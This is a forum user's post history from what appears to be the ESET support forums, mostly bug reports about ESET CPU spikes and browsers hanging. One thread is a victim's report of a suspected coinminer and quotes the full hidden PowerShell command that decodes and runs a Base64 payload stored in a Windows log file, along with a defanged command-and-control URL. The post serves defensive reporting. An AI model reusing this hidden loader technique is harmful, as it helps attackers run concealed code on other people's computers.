Kevin999
Members-
Posts
43 -
Joined
-
Last visited
-
Days Won
1
Everything posted by Kevin999
-
Bitcomet utilize too much CPU (about 1 CPU core, i.e ~25%) is a known issue caused by BitComet's UDP transmission thread (BT DHT network (and maybe uTP)), but egui.exe sometimes also utilize ~25% on my computer (Intel Core i5-4690, 4 cores). Egui,exe CPU usage bug reproduce today, it happens when keeping at Network Connection page, I'll send you the log later.
-
This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), although Firefox have been run for some time, it also couldn't open any website, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.
-
This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), because Firefox have been run for some time, so it works well, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.
-
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
How about only disable PS Remoting capability (especially incoming package) by EIS firewall by default? Beacuse most user maybe don't know how to use powershell. https://4sysops.com/wiki/disable-powershell-remoting-disable-psremoting-winrm-listener-firewall-and-localaccounttokenfilterpolicy/#disable-the-firewall-exceptions Besides, I think Windows Remote Management is less used by home user, EIS firewall could also block it by default to provide higher security. -
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
I think ESET internet protection could block Windows Remote Management (WS-Management) by default (especially incoming package), and add an option to allow it manually. -
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
What should I do? My computer has been install VMware Workstation 16 Pro (16.2.3 build-19376536). -
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it no longer detected after that. -
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
I also use ESET SysInspector to capture a snapshot, I can upload it if in need. -
Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today. Conhost.exe and powershell.exe was running background, but I didn't run each of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves. I use ESET SysInspector to captured a snapshot. I used nslookup to reslove: C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07 DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.1 DNS request timed out. timeout was 2 seconds. *** 请求 UnKnown 超时 C:\Users\Admin>nslookup api.private-chatting.com DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.1 非权威应答: 名称: api.private-chatting.com Addresses: 2606:4700:3032::6815:38d6 2606:4700:3031::ac43:9c07 104.21.56.214 __Today__ I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block} 2. Find C:\Windows\logs\system-logs.txt , find these strings Snipped: The code was moved to the the attached file to squeeze the post. Please note $EndPointURL = "hxxp://api.private-chatting.com/connect"; It's as same as the URL in pcapng file. system-logs.txt Strange traffic_20220424.rar system-logs.rar
-
Now I using Windows 10 Enterprise LTSC 2022 x64 (21H2). This bug even happened when I was using Windows 10 Enterprise LTSC 2019 x64 (1809), my Windows was clean upgrade (delete system partition, EFI system partition and recovery partition), so I can confirm I have been tried a complete clean install of ESET.
-
This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, IE couldn't open any website (always keeping loading), Firefox and Edge couldn't launch (has processes). I will send you the dump later. By the way, I use ESET Log Collecter after restart computer though the dump was created first.
-
This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, IE and Edge couldn't open any website (always keeping loading), Firefox is OK. I will send you the dump later. By the way, I use ESET Log Collecter after restart computer though the dump was created first.